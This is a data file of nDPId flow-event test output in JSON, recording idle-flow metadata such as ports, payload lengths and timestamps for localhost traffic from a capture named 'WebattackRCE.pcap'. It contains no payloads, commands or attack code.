-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276835,"flow_last_seen":1576420276835,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7440000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7440000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7440000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7440000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
